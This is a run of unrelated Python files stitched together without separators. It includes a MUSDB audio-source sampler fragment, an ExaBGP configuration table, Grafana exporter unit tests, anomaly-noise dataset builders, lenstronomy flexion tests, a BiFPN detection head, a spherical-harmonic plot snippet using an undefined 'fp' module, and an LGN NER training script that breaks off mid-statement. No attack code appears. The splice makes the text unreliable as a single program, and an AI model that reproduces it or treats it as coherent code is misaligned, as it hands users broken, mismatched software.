            source_audios = []
            for k, source in enumerate(self.mus.setup['sources']):
                if source == self.args.target:
                    # memorize index of target source
                    target_index = k
                if self.random_track_mix:
                    # draw each source from a freshly chosen track
                    track = random.choice(self.mus.tracks)
                # random excerpt of fixed duration
                track.chunk_duration = self.args.seq_dur
                track.chunk_start = random.uniform(
                    0, track.duration - self.args.seq_dur)
                audio = track.sources[source].audio.T
                source_audios.append(self.source_augmentations(audio))

            # stem tensor of shape (source, channel, samples)
            stems = np.stack(source_audios, axis=0)
            # linear mix over the source axis
            x = np.sum(stems, axis=0)
            if target_index is not None:
                y = stems[target_index]
            else:
                # vocal/accompaniment scenario when target != any source:
                # subtract vocals from the mix in the time domain
                vocal_index = list(
                    self.mus.setup['sources'].keys()).index('vocals')
                y = x - stems[vocal_index]
        else:
            # Validation/test: deterministically yield the full musdb track
            # with its original (non-linear) mix.
            x = track.audio.T
            y = track.targets[self.args.target].audio.T
        return x, y

    def reset(self):
        """Reshuffle (or re-enumerate) the sample indexes for a new epoch."""
        if self._shuffle:
            self._indexes = self.rng.permutation(self._size)
        else:
            self._indexes = np.arange(self._size)
        super(MUSDBDataSource, self).reset()
# encoding: utf-8
"""
setup.py

Created by <NAME> on 2014-12-23.
Copyright (c) 2014-2017 Exa Networks. All rights reserved.
License: 3-clause BSD. (See the COPYRIGHT file)
"""

from exabgp.environment import parsing
from exabgp.environment.environment import Env

# Indentation used to align continuation lines in multi-line help texts.
_SPACE = {'space': ' ' * 33}

LOGGING_HELP_STDOUT = (
    """\
where logging should log
%(space)s syslog (or no setting) sends the data to the local syslog syslog
%(space)s host:<location> sends the data to a remote syslog server
%(space)s stdout sends the data to stdout
%(space)s stderr sends the data to stderr
%(space)s <filename> send the data to a file"""
    % _SPACE
)


def _option(read, write, value, help_text):
    # Build one configuration entry; every entry shares this exact shape.
    return {'read': read, 'write': write, 'value': value, 'help': help_text}


CONFIGURATION = {
    'profile': {
        'enable': _option(parsing.boolean, parsing.lower, 'false',
                          'toggle profiling of the code'),
        'file': _option(parsing.unquote, parsing.quote, '',
                        'profiling result file, none means stdout, no overwriting'),
    },
    'pdb': {
        'enable': _option(parsing.boolean, parsing.lower, 'false',
                          'on program fault, start pdb the python interactive debugger'),
    },
    'daemon': {
        'pid': _option(parsing.unquote, parsing.quote, '',
                       'where to save the pid if we manage it'),
        'user': _option(parsing.user, parsing.quote, 'nobody',
                        'user to run the program as'),
        'daemonize': _option(parsing.boolean, parsing.lower, 'false',
                             'should we run in the background'),
        'drop': _option(parsing.boolean, parsing.lower, 'true',
                        'drop privileges before forking processes'),
        'umask': _option(parsing.umask_read, parsing.umask_write, '0137',
                         'run daemon with this umask, governs perms of logfiles etc.'),
    },
    'log': {
        'enable': _option(parsing.boolean, parsing.lower, 'true',
                          'enable logging to file or syslog'),
        'level': _option(parsing.syslog_value, parsing.syslog_name, 'INFO',
                         'log message with at least the priority SYSLOG.<level>'),
        'destination': _option(parsing.unquote, parsing.quote, 'stdout',
                               LOGGING_HELP_STDOUT),
        'all': _option(parsing.boolean, parsing.lower, 'false',
                       'report debug information for everything'),
        'configuration': _option(parsing.boolean, parsing.lower, 'true',
                                 'report command parsing'),
        'reactor': _option(parsing.boolean, parsing.lower, 'true',
                           'report signal received, command reload'),
        'daemon': _option(parsing.boolean, parsing.lower, 'true',
                          'report pid change, forking, ...'),
        'processes': _option(parsing.boolean, parsing.lower, 'true',
                             'report handling of forked processes'),
        'network': _option(parsing.boolean, parsing.lower, 'true',
                           'report networking information (TCP/IP, network state,...)'),
        'packets': _option(parsing.boolean, parsing.lower, 'false',
                           'report BGP packets sent and received'),
        'rib': _option(parsing.boolean, parsing.lower, 'false',
                       'report change in locally configured routes'),
        'message': _option(parsing.boolean, parsing.lower, 'false',
                           'report changes in route announcement on config reload'),
        'timers': _option(parsing.boolean, parsing.lower, 'false',
                          'report keepalives timers'),
        'routes': _option(parsing.boolean, parsing.lower, 'false',
                          'report received routes'),
        'parser': _option(parsing.boolean, parsing.lower, 'false',
                          'report BGP message parsing details'),
        'short': _option(parsing.boolean, parsing.lower, 'true',
                         'use short log format (not prepended with time,level,pid and source)'),
    },
    'tcp': {
        'once': _option(parsing.boolean, parsing.lower, 'false',
                        'only one tcp connection attempt per peer (for debuging scripts)'),
        'delay': _option(parsing.integer, parsing.nop, '0',
                         'start to announce route when the minutes in the hours is a modulo of this number'),
        'bind': _option(parsing.ip_list, parsing.quote_list, '',
                        'Space separated list of IPs to bind on when listening (no ip to disable)'),
        'port': _option(parsing.integer, parsing.nop, '179',
                        'port to bind on when listening'),
        'acl': _option(parsing.boolean, parsing.lower, '',
                       '(experimental please do not use) unimplemented'),
    },
    'bgp': {
        'passive': _option(parsing.boolean, parsing.lower, 'false',
                           'ignore the peer configuration and make all peers passive'),
        'openwait': _option(parsing.integer, parsing.nop, '60',
                            'how many seconds we wait for an open once the TCP session is established'),
    },
    'cache': {
        'attributes': _option(parsing.boolean, parsing.lower, 'true',
                              'cache all attributes (configuration and wire) for faster parsing'),
        'nexthops': _option(parsing.boolean, parsing.lower, 'true',
                            'cache routes next-hops (deprecated: next-hops are always cached)'),
    },
    'api': {
        'ack': _option(parsing.boolean, parsing.lower, 'true',
                       'acknowledge api command(s) and report issues'),
        'chunk': _option(parsing.integer, parsing.nop, '1',
                         'maximum lines to print before yielding in show routes api'),
        'encoder': _option(parsing.api, parsing.lower, 'json',
                           '(experimental) default encoder to use with with external API (text or json)'),
        'compact': _option(parsing.boolean, parsing.lower, 'false',
                           'shorter JSON encoding for IPv4/IPv6 Unicast NLRI'),
        'respawn': _option(parsing.boolean, parsing.lower, 'true',
                           'should we try to respawn helper processes if they dies'),
        'terminate': _option(parsing.boolean, parsing.lower, 'false',
                             'should we terminate ExaBGP if any helper process dies'),
        'cli': _option(parsing.boolean, parsing.lower, 'true',
                       'should we create a named pipe for the cli'),
        'pipename': _option(parsing.unquote, parsing.quote, 'exabgp',
                            'name to be used for the exabgp pipe'),
    },
    'reactor': {
        'speed': _option(parsing.real, parsing.nop, '1.0',
                         'reactor loop time\n%(space)s use only if you understand the code.' % _SPACE),
    },
    # Here for internal use
    'debug': {
        'pdb': _option(parsing.boolean, parsing.lower, 'false',
                       'enable python debugger on errors'),
        'memory': _option(parsing.boolean, parsing.lower, 'false',
                          'command line option --memory'),
        'configuration': _option(parsing.boolean, parsing.lower, 'false',
                                 'undocumented option: raise when parsing configuration errors'),
        'selfcheck': _option(parsing.boolean, parsing.lower, 'false',
                             'does a self check on the configuration file'),
        'route': _option(parsing.unquote, parsing.quote, '',
                         'decode the route using the configuration'),
        'defensive': _option(parsing.boolean, parsing.lower, 'false',
                             'generate random fault in the code in purpose'),
        'rotate': _option(parsing.boolean, parsing.lower, 'false',
                          'rotate configurations file on reload (signal)'),
    },
}

# load the environment
Env.setup(CONFIGURATION)
# -*- coding: utf-8 -*-
# Copyright 2015-2019 grafana-dashboard-builder contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals

import pytest
from mock import patch, MagicMock

from grafana_dashboards.exporter import ProjectProcessor, FileExporter

__author__ = '<NAME> <<EMAIL>>'


def test_project_processor():
    """Each (context, dashboard) pair is rendered and forwarded once."""
    dashboard_processor = MagicMock()
    processor = ProjectProcessor([dashboard_processor])

    # One project yielding a single context and a single dashboard.
    project = MagicMock()
    context = MagicMock()
    dashboard = MagicMock()
    project.get_contexts.return_value = [context]
    project.get_dashboards.return_value = [dashboard]
    parent_context = MagicMock()

    # noinspection PyTypeChecker
    processor.process_projects([project], parent_context)

    project.get_contexts.assert_called_once_with(parent_context)
    dashboard.gen_json.assert_called_with(context)
    context.expand_placeholders.assert_called_with(dashboard.name)
    dashboard_processor.process_dashboard.assert_called_once_with(
        project.name, context.expand_placeholders(), dashboard.gen_json())


@patch('grafana_dashboards.exporter.open', create=True)
@patch('json.dump')
@patch('os.makedirs', return_value=True)
@patch('os.path.isdir', return_value=True)
@patch('os.path.exists', return_value=True)
def test_file_exporter(patch_exists, path_isdir, makedirs, json_dump, mock_file):
    """A dashboard is serialized to JSON into the opened output file."""
    exporter = FileExporter('output_folder')
    payload = {'some_key': 'some_value'}

    exporter.process_dashboard('project_name', 'dashboard_name', payload)

    json_dump.assert_called_once_with(
        payload,
        mock_file().__enter__(),
        sort_keys=True,
        indent=2,
        separators=(',', ': '))


@patch('os.makedirs', side_effect=[True, OSError('testing')])
@patch('os.path.isdir', return_value=True)
@patch('os.path.exists', return_value=False)
def test_file_exporter_path_not_exist(patch_exists, path_isdir, makedirs):
    """An OSError while creating the project directory propagates."""
    exporter = FileExporter('output_folder')
    payload = {'some_key': 'some_value'}

    with pytest.raises(Exception) as e:
        exporter.process_dashboard('project_name', 'dashboard_name', payload)
    assert 'testing' in str(e.value)


@patch('os.makedirs', return_value=True)
@patch('os.path.isdir', return_value=False)
@patch('os.path.exists', return_value=False)
def test_file_exporter_output_not_dir(patch_exists, path_isdir, makedirs):
    """Constructing the exporter fails when the target is not a directory."""
    with pytest.raises(Exception) as e:
        FileExporter('output_folder')
    assert "'output_folder' must be a directory" in str(e.value)
from typing import List

import torch
from torch.utils.data.dataset import Dataset


def noise(outlier_classes: List[int], generated_noise: torch.Tensor, norm: torch.Tensor,
          nom_class: int, train_set: Dataset, gt: bool = False) -> Dataset:
    """
    Creates a dataset based on the nominal classes of a given dataset and generated noise anomalies.
    :param outlier_classes: a list of all outlier class indices.
    :param generated_noise: torch tensor of noise images (might also be Outlier Exposure based noise) (n x c x h x w).
    :param norm: torch tensor of nominal images (n x c x h x w).
    :param nom_class: the index of the class that is considered nominal.
    :param train_set: some training dataset.
    :param gt: whether to provide ground-truth maps as well, atm not available!
    :return: a modified dataset, with training data consisting of nominal samples and artificial anomalies.
    """
    if gt:
        raise ValueError('No GT mode for pure noise available!')
    # Noise images are used directly as anomalies, clipped to valid pixel range.
    anomalies = generated_noise.clamp(0, 255).byte()
    train_set.data = torch.cat((norm, anomalies))
    # Nominal samples keep nom_class; all anomalies get the first outlier class.
    train_set.targets = torch.cat(
        (torch.ones(norm.size(0)) * nom_class,
         torch.ones(anomalies.size(0)) * outlier_classes[0])
    )
    return train_set


def malformed_normal(outlier_classes: List[int], generated_noise: torch.Tensor, norm: torch.Tensor,
                     nom_class: int, train_set: Dataset, gt: bool = False,
                     brightness_threshold: float = 0.11 * 255) -> Dataset:
    """
    Creates a dataset based on the nominal classes of a given dataset and generated noise anomalies.
    Unlike above, the noise images are not directly utilized as anomalies, but added to nominal
    samples to create malformed normal anomalies.
    :param outlier_classes: a list of all outlier class indices.
    :param generated_noise: torch tensor of noise images (might also be Outlier Exposure based noise) (n x c x h x w).
    :param norm: torch tensor of nominal images (n x c x h x w).
    :param nom_class: the index of the class that is considered nominal.
    :param train_set: some training dataset.
    :param gt: whether to provide ground-truth maps as well.
    :param brightness_threshold: if the average brightness (averaged over color channels) of a pixel
        exceeds this threshold, the noise image's pixel value is subtracted instead of added.
        This avoids adding brightness values to bright pixels, where approximately no effect
        is achieved at all.
    :return: a modified dataset, with training data consisting of nominal samples and artificial anomalies.
    """
    assert (norm.dim() == 4 or norm.dim() == 3) and generated_noise.shape == norm.shape
    had_no_channel_dim = norm.dim() == 3
    if had_no_channel_dim:
        # assuming the channel dimension was skipped; add it back temporarily
        norm = norm.unsqueeze(1)
        generated_noise = generated_noise.unsqueeze(1)

    anom = norm.clone()
    generated_noise = generated_noise.int()
    # Pixels whose per-channel average exceeds the threshold are "bright":
    # there, noise is subtracted instead of added.
    bright_regions = norm.sum(1) > brightness_threshold * norm.shape[1]
    for channel in range(norm.shape[1]):
        channel_noise = generated_noise[:, channel]
        channel_noise[bright_regions] = channel_noise[bright_regions] * -1
        generated_noise[:, channel] = channel_noise

    anom = (anom.int() + generated_noise).clamp(0, 255).byte()
    data = torch.cat((norm, anom))
    targets = torch.cat(
        (torch.ones(norm.size(0)) * nom_class,
         torch.ones(anom.size(0)) * outlier_classes[0])
    )
    if had_no_channel_dim:
        data = data.squeeze(1)
    train_set.data = data
    train_set.targets = targets

    if not gt:
        return train_set
    # Ground truth: 0 everywhere for nominal samples, 1 wherever any channel
    # of an anomaly differs from the original nominal pixel.
    gtmaps = torch.cat(
        (torch.zeros_like(norm)[:, 0].float(),          # 0 for nominal
         (norm != anom).max(1)[0].clone().float())      # 1 for anomalous
    )
    if not had_no_channel_dim:
        gtmaps = gtmaps.unsqueeze(1)
    return train_set, gtmaps
__author__ = 'sibirrer'

from lenstronomy.LensModel.Profiles.flexion import Flexion
from lenstronomy.LensModel.lens_model import LensModel

import numpy as np
import numpy.testing as npt
import pytest


class TestExternalShear(object):
    """
    tests the Gaussian methods
    """

    def setup(self):
        self.flex = Flexion()
        # Fixed flexion coefficients shared by all tests below.
        self.kwargs_lens = {'g1': 0.01, 'g2': 0.02, 'g3': 0.03, 'g4': 0.04}

    def test_function(self):
        # single position
        result = self.flex.function(np.array([1]), np.array([2]), **self.kwargs_lens)
        npt.assert_almost_equal(result[0], 0.135, decimal=5)

        # the potential vanishes at the origin
        result = self.flex.function(np.array([0]), np.array([0]), **self.kwargs_lens)
        npt.assert_almost_equal(result[0], 0, decimal=5)

        # vectorized call
        xs, ys = np.array([2, 3, 4]), np.array([1, 1, 1])
        result = self.flex.function(xs, ys, **self.kwargs_lens)
        npt.assert_almost_equal(result[0], 0.09, decimal=5)
        npt.assert_almost_equal(result[1], 0.18666666666666668, decimal=5)

    def test_derivatives(self):
        f_x, f_y = self.flex.derivatives(np.array([1]), np.array([2]), **self.kwargs_lens)
        npt.assert_almost_equal(f_x[0], 0.105, decimal=5)
        npt.assert_almost_equal(f_y[0], 0.15, decimal=5)

        # vectorized call: first entry must match the scalar case above
        xs, ys = np.array([1, 3, 4]), np.array([2, 1, 1])
        f_x, f_y = self.flex.derivatives(xs, ys, **self.kwargs_lens)
        npt.assert_almost_equal(f_x[0], 0.105, decimal=5)
        npt.assert_almost_equal(f_y[0], 0.15, decimal=5)

    def test_hessian(self):
        f_xx, f_xy, f_yx, f_yy = self.flex.hessian(np.array(1), np.array(2), **self.kwargs_lens)
        npt.assert_almost_equal(f_xx, 0.05, decimal=5)
        npt.assert_almost_equal(f_yy, 0.11, decimal=5)
        npt.assert_almost_equal(f_xy, 0.08, decimal=5)
        # the Hessian must be symmetric
        npt.assert_almost_equal(f_xy, f_yx, decimal=8)

        xs, ys = np.array([1, 3, 4]), np.array([2, 1, 1])
        result = self.flex.hessian(xs, ys, **self.kwargs_lens)
        npt.assert_almost_equal(result[0][0], 0.05, decimal=5)
        npt.assert_almost_equal(result[3][0], 0.11, decimal=5)
        npt.assert_almost_equal(result[2][0], 0.08, decimal=5)
        npt.assert_almost_equal(result[1][0], 0.08, decimal=5)

    def test_flexion(self):
        # third derivatives reproduce the flexion coefficients exactly
        lens = LensModel(['FLEXION'])
        f_xxx, f_xxy, f_xyy, f_yyy = lens.flexion(np.array(0), np.array(2), [self.kwargs_lens])
        npt.assert_almost_equal(f_xxx, self.kwargs_lens['g1'], decimal=9)
        npt.assert_almost_equal(f_xxy, self.kwargs_lens['g2'], decimal=9)
        npt.assert_almost_equal(f_xyy, self.kwargs_lens['g3'], decimal=9)
        npt.assert_almost_equal(f_yyy, self.kwargs_lens['g4'], decimal=9)

    def test_magnification(self):
        # magnification at the reference point (ra_0, dec_0) is exactly 1
        ra_0, dec_0 = 1, -1
        lens = LensModel(['FLEXION'])
        kwargs = {'g1': 0.01, 'g2': 0.02, 'g3': 0.03, 'g4': 0.04,
                  'ra_0': ra_0, 'dec_0': dec_0}
        mag = lens.magnification(ra_0, dec_0, [kwargs])
        npt.assert_almost_equal(mag, 1, decimal=8)


if __name__ == '__main__':
    pytest.main()
from aw_nas.weights_manager.wrapper import BaseHead

from .classifiers import BiFPNClassifier

__all__ = ["BiFPNHead"]


class BiFPNHead(BaseHead):
    """Detection head with separate BiFPN-based regression and classification
    branches applied to a list of feature maps.

    Bug fixes relative to the original:
    - ``super(BiFPNHeader).__init__(schedule_cfg)`` referenced the undefined
      name ``BiFPNHeader`` and built an unbound super object; fixed to
      ``super(BiFPNHead, self).__init__(schedule_cfg)``.
    - The body read ``has_background`` while the parameter was spelled
      ``has_backgroud``; the misspelled parameter name is kept for caller
      compatibility, and the body now reads it.
    - ``self.pretrained_path = pretrained_path`` read an undefined name;
      ``pretrained_path`` is now an explicit keyword parameter defaulting
      to ``None`` (backward compatible).
    """

    NAME = "bifpn_head"

    def __init__(
        self,
        device,
        num_classes,
        feature_channels,
        bifpn_out_channels,
        activation="swish",
        num_layers=4,
        has_backgroud=True,  # NOTE: misspelling kept for backward compat
        schedule_cfg=None,
        pretrained_path=None,
    ):
        super(BiFPNHead, self).__init__(schedule_cfg)
        self.num_classes = num_classes
        # Fixed anchor count per location; presumably 3 scales x 3 ratios
        # as in EfficientDet-style heads — TODO confirm against the anchor
        # generator used by callers.
        num_anchors = 9
        # Regression branch: 4 box coordinates per anchor.
        self.reg = BiFPNClassifier(
            bifpn_out_channels, num_anchors, 4, num_layers, activation
        )
        # Classification branch: one extra class slot when a background
        # class is requested.
        self.cls = BiFPNClassifier(
            bifpn_out_channels,
            num_anchors,
            num_classes + int(has_backgroud),
            num_layers,
            activation,
        )
        self.device = device
        self.pretrained_path = pretrained_path

    def forward(self, features):
        """Return (class scores, box regressions) for the input features."""
        return self.cls(features), self.reg(features)
# Real part of spherical harmonic Y_(4,2)(theta,phi)
def Y(l, m):
    """Return a callable (theta, phi) -> [x, y, z] tracing the surface whose
    radius is |Re Y_{l,m}(theta, phi)|, converted to Cartesian coordinates.
    """
    def surface(theta, phi):
        radius = abs(fp.re(fp.spherharm(l, m, theta, phi)))
        sin_theta = fp.sin(theta)
        return [
            radius * fp.cos(phi) * sin_theta,
            radius * fp.sin(phi) * sin_theta,
            radius * fp.cos(theta),
        ]
    return surface


# Plot the surface over the full sphere: theta in [0, pi], phi in [0, 2*pi].
fp.splot(Y(4, 2), [0, fp.pi], [0, 2 * fp.pi], points=300)
# -*- coding: utf-8 -*-
# @Author: <NAME>
# @Last Modified by: <NAME>, Contact: <EMAIL>

import argparse
import gc
import os
import pickle
import random
import sys
import time

import numpy as np
import torch
import torch.autograd as autograd
import torch.optim as optim

from utils.metric import get_ner_fmeasure
from model.LGN import Graph
from utils.data import Data


def str2bool(v):
    """Parse a command-line value into a bool.

    Accepts an actual bool, or the usual textual spellings
    (yes/no, true/false, t/f, y/n, 1/0, case-insensitive).

    Raises:
        argparse.ArgumentTypeError: for any other string.
    """
    if isinstance(v, bool):
        return v
    if v.lower() in ('yes', 'true', 't', 'y', '1'):
        return True
    elif v.lower() in ('no', 'false', 'f', 'n', '0'):
        return False
    else:
        raise argparse.ArgumentTypeError('Boolean value expected.')


def lr_decay(optimizer, epoch, decay_rate, init_lr):
    """Exponentially decay the learning rate and apply it to all param groups.

    The group named 'aggr' (the aggregation modules, see ``train``) gets
    twice the base learning rate; every other group gets the base rate.

    Returns the (mutated) optimizer.
    """
    lr = init_lr * ((1 - decay_rate) ** epoch)
    print(" Learning rate is setted as:", lr)
    for param_group in optimizer.param_groups:
        if param_group['name'] == 'aggr':
            # Aggregation modules train with a doubled learning rate.
            param_group['lr'] = lr * 2.
        else:
            param_group['lr'] = lr
    return optimizer


def data_initialization(data, word_file, train_file, dev_file, test_file):
    """Build the word file and the char/word alphabets from the data files.

    Any of train/dev/test may be falsy and is then skipped.
    Returns the (mutated) ``data`` object.
    """
    data.build_word_file(word_file)
    if train_file:
        data.build_alphabet(train_file)
        data.build_word_alphabet(train_file)
    if dev_file:
        data.build_alphabet(dev_file)
        data.build_word_alphabet(dev_file)
    if test_file:
        data.build_alphabet(test_file)
        data.build_word_alphabet(test_file)
    return data


def predict_check(pred_variable, gold_variable, mask_variable):
    """Count token-level agreement between predictions and gold labels.

    Only positions where the mask is nonzero are counted.

    Returns:
        (right_token, total_token): number of matching tokens and the
        total number of unmasked tokens.
    """
    pred = pred_variable.cpu().data.numpy()
    gold = gold_variable.cpu().data.numpy()
    mask = mask_variable.cpu().data.numpy()
    overlaped = (pred == gold)
    # Masked positions contribute 0, so padding never counts as correct.
    right_token = np.sum(overlaped * mask)
    total_token = mask.sum()
    return right_token, total_token


def recover_label(pred_variable, gold_variable, mask_variable, label_alphabet):
    """Convert predicted/gold label-id tensors back into label strings.

    Padding positions (mask == 0) are dropped, so each recovered sequence
    has the sentence's true length.

    Returns:
        (pred_label, gold_label): two lists of per-sentence label-string lists.
    """
    batch_size = gold_variable.size(0)
    seq_len = gold_variable.size(1)
    mask = mask_variable.cpu().data.numpy()
    pred_tag = pred_variable.cpu().data.numpy()
    gold_tag = gold_variable.cpu().data.numpy()
    pred_label = []
    gold_label = []
    for idx in range(batch_size):
        pred = [label_alphabet.get_instance(pred_tag[idx][idy])
                for idy in range(seq_len) if mask[idx][idy] != 0]
        gold = [label_alphabet.get_instance(gold_tag[idx][idy])
                for idy in range(seq_len) if mask[idx][idy] != 0]
        # Pred and gold come from the same mask, so lengths must agree.
        assert (len(pred) == len(gold))
        pred_label.append(pred)
        gold_label.append(gold)
    return pred_label, gold_label


def print_args(args):
    """Print a human-readable summary of the run configuration."""
    print("CONFIG SUMMARY:")
    print(" Batch size: %s" % (args.batch_size))
    print(" If use GPU: %s" % (args.use_gpu))
    print(" If use CRF: %s" % (args.use_crf))
    print(" Epoch number: %s" % (args.num_epoch))
    print(" Learning rate: %s" % (args.lr))
    print(" L2 normalization rate: %s" % (args.weight_decay))
    print(" If use edge embedding: %s" % (args.use_edge))
    print(" If use global node: %s" % (args.use_global))
    print(" Bidirectional digraph: %s" % (args.bidirectional))
    print(" Update step number: %s" % (args.iters))
    print(" Attention dropout rate: %s" % (args.tf_drop_rate))
    print(" Embedding dropout rate: %s" % (args.emb_drop_rate))
    print(" Hidden state dimension: %s" % (args.hidden_dim))
    print(" Learning rate decay ratio: %s" % (args.lr_decay))
    print(" Aggregation module dropout rate: %s" % (args.cell_drop_rate))
    print(" Head number of attention: %s" % (args.num_head))
    print(" Head dimension of attention: %s" % (args.head_dim))
    print("CONFIG SUMMARY END.")
    sys.stdout.flush()


def evaluate(data, args, model, name):
    """Run the model over one data split and score it.

    Args:
        name: one of "train"/"dev"/"test"/"raw", selecting the instance set.

    Returns:
        (speed, acc, p, r, f, pred_results): sentences/second, accuracy,
        precision, recall, F1 (via ``get_ner_fmeasure``) and the decoded
        label sequences.
    """
    if name == "train":
        instances = data.train_Ids
    elif name == "dev":
        instances = data.dev_Ids
    elif name == 'test':
        instances = data.test_Ids
    elif name == 'raw':
        instances = data.raw_Ids
    else:
        print("Error: wrong evaluate name,", name)
        # Fixed: was exit(0), which reported success on an error path.
        sys.exit(1)
    pred_results = []
    gold_results = []
    # set model in eval model
    model.eval()
    batch_size = args.batch_size
    start_time = time.time()
    train_num = len(instances)
    total_batch = train_num // batch_size + 1
    for batch_id in range(total_batch):
        start = batch_id * batch_size
        end = (batch_id + 1) * batch_size
        if end > train_num:
            end = train_num
        instance = instances[start:end]
        if not instance:
            # total_batch overshoots by one when train_num is a multiple
            # of batch_size; skip the resulting empty slice.
            continue
        word_list, batch_char, batch_label, mask = batchify_with_label(
            instance, args.use_gpu)
        _, tag_seq = model(word_list, batch_char, mask)
        pred_label, gold_label = recover_label(
            tag_seq, batch_label, mask, data.label_alphabet)
        pred_results += pred_label
        gold_results += gold_label
    decode_time = time.time() - start_time
    speed = len(instances) / decode_time
    acc, p, r, f = get_ner_fmeasure(gold_results, pred_results)
    return speed, acc, p, r, f, pred_results


def batchify_with_label(input_batch_list, gpu):
    """Pad a batch of (char_ids, words, label_ids) instances into tensors.

    Each instance is indexed as sent[0]=char ids, sent[1]=words,
    sent[2]=label ids (see the calls in ``train``/``evaluate``).

    Returns:
        (words, char_seq_tensor, label_seq_tensor, mask) where the tensors
        are (batch, max_len) and mask marks real (non-padding) positions.
    """
    batch_size = len(input_batch_list)
    chars = [sent[0] for sent in input_batch_list]
    words = [sent[1] for sent in input_batch_list]
    labels = [sent[2] for sent in input_batch_list]
    sent_lengths = torch.LongTensor(list(map(len, chars)))
    max_sent_len = sent_lengths.max()
    char_seq_tensor = autograd.Variable(
        torch.zeros((batch_size, max_sent_len))).long()
    label_seq_tensor = autograd.Variable(
        torch.zeros((batch_size, max_sent_len))).long()
    mask = autograd.Variable(torch.zeros((batch_size, max_sent_len))).byte()
    for idx, (seq, label, seq_len) in enumerate(
            zip(chars, labels, sent_lengths)):
        char_seq_tensor[idx, :seq_len] = torch.LongTensor(seq)
        label_seq_tensor[idx, :seq_len] = torch.LongTensor(label)
        mask[idx, :seq_len] = torch.Tensor([1] * int(seq_len))
    if gpu:
        char_seq_tensor = char_seq_tensor.cuda()
        label_seq_tensor = label_seq_tensor.cuda()
        mask = mask.cuda()
    return words, char_seq_tensor, label_seq_tensor, mask


def train(data, args, saved_model_path):
    """Train the LGN graph model, evaluating on dev/test after each epoch.

    Saves a per-epoch checkpoint (<path>_<epoch>), the best-on-dev model
    (<path>_best), a running result log (<path>_result.txt), and the final
    hyper-parameters (<path>_best_HP.config).
    """
    print("Training model...")
    model = Graph(data, args)
    if args.use_gpu:
        model = model.cuda()
    print('# generated parameters:',
          sum(param.numel() for param in model.parameters()))
    print("Finished built model.")
    best_dev_epoch = 0
    best_dev_f = -1
    best_dev_p = -1
    best_dev_r = -1
    best_test_f = -1
    best_test_p = -1
    best_test_r = -1
    # Initialize the optimizer: ModuleList submodules (the aggregation
    # modules) go in the 'aggr' group, which lr_decay gives a doubled lr.
    aggr_module_params = []
    other_module_params = []
    for m_name in model._modules:
        m = model._modules[m_name]
        if isinstance(m, torch.nn.ModuleList):
            for p in m.parameters():
                if p.requires_grad:
                    aggr_module_params.append(p)
        else:
            for p in m.parameters():
                if p.requires_grad:
                    other_module_params.append(p)
    optimizer = optim.Adam(
        [{"params": (aggr_module_params), "name": "aggr"},
         {"params": (other_module_params), "name": "other"}],
        lr=args.lr, weight_decay=args.weight_decay)
    for idx in range(args.num_epoch):
        epoch_start = time.time()
        temp_start = epoch_start
        print(("Epoch: %s/%s" % (idx, args.num_epoch)))
        optimizer = lr_decay(optimizer, idx, args.lr_decay, args.lr)
        sample_loss = 0
        batch_loss = 0
        total_loss = 0
        right_token = 0
        whole_token = 0
        random.shuffle(data.train_Ids)
        # set model in train model
        model.train()
        model.zero_grad()
        batch_size = args.batch_size
        train_num = len(data.train_Ids)
        total_batch = train_num // batch_size + 1
        for batch_id in range(total_batch):
            # Get one batch-sized instance
            start = batch_id * batch_size
            end = (batch_id + 1) * batch_size
            if end > train_num:
                end = train_num
            instance = data.train_Ids[start:end]
            if not instance:
                continue
            word_list, batch_char, batch_label, mask = batchify_with_label(
                instance, args.use_gpu)
            loss, tag_seq = model(word_list, batch_char, mask, batch_label)
            right, whole = predict_check(tag_seq, batch_label, mask)
            right_token += right
            whole_token += whole
            sample_loss += loss.data
            total_loss += loss.data
            batch_loss += loss
            if end % 500 == 0:
                temp_time = time.time()
                temp_cost = temp_time - temp_start
                temp_start = temp_time
                print((" Instance: %s; Time: %.2fs; loss: %.4f; acc: %s/%s=%.4f"
                       % (end, temp_cost, sample_loss, right_token,
                          whole_token, (right_token + 0.) / whole_token)))
                sys.stdout.flush()
                sample_loss = 0
            if end % args.batch_size == 0:
                # Step once per accumulated batch.
                batch_loss.backward()
                optimizer.step()
                model.zero_grad()
                batch_loss = 0
        temp_time = time.time()
        temp_cost = temp_time - temp_start
        print((" Instance: %s; Time: %.2fs; loss: %.4f; acc: %s/%s=%.4f"
               % (end, temp_cost, sample_loss, right_token, whole_token,
                  (right_token + 0.) / whole_token)))
        epoch_finish = time.time()
        epoch_cost = epoch_finish - epoch_start
        print(("Epoch: %s training finished. Time: %.2fs, speed: %.2fst/s, total loss: %s"
               % (idx, epoch_cost, train_num / epoch_cost, total_loss)))
        # dev
        speed, acc, dev_p, dev_r, dev_f, _ = evaluate(data, args, model, "dev")
        dev_finish = time.time()
        dev_cost = dev_finish - epoch_finish
        print(("Dev: time: %.2fs, speed: %.2fst/s; acc: %.4f, p: %.4f, r: %.4f, f: %.4f"
               % (dev_cost, speed, acc, dev_p, dev_r, dev_f)))
        # test
        speed, acc, test_p, test_r, test_f, _ = evaluate(data, args, model, "test")
        test_finish = time.time()
        test_cost = test_finish - dev_finish
        print(("Test: time: %.2fs, speed: %.2fst/s; acc: %.4f, p: %.4f, r: %.4f, f: %.4f"
               % (test_cost, speed, acc, test_p, test_r, test_f)))
        if dev_f > best_dev_f:
            print("Exceed previous best f score: %.4f" % best_dev_f)
            torch.save(model.state_dict(), saved_model_path + "_best")
            best_dev_p = dev_p
            best_dev_r = dev_r
            best_dev_f = dev_f
            best_dev_epoch = idx + 1
            best_test_p = test_p
            best_test_r = test_r
            best_test_f = test_f
        model_idx_path = saved_model_path + "_" + str(idx)
        torch.save(model.state_dict(), model_idx_path)
        # Fixed: the original closed the file inside the `with` block
        # (redundant double-close) and shadowed the builtin name `file`.
        with open(saved_model_path + "_result.txt", "a") as result_file:
            result_file.write(model_idx_path + '\n')
            result_file.write("Dev score: %.4f, r: %.4f, f: %.4f\n"
                              % (dev_p, dev_r, dev_f))
            result_file.write("Test score: %.4f, r: %.4f, f: %.4f\n\n"
                              % (test_p, test_r, test_f))
        print("Best dev epoch: %d" % best_dev_epoch)
        print("Best dev score: p: %.4f, r: %.4f, f: %.4f"
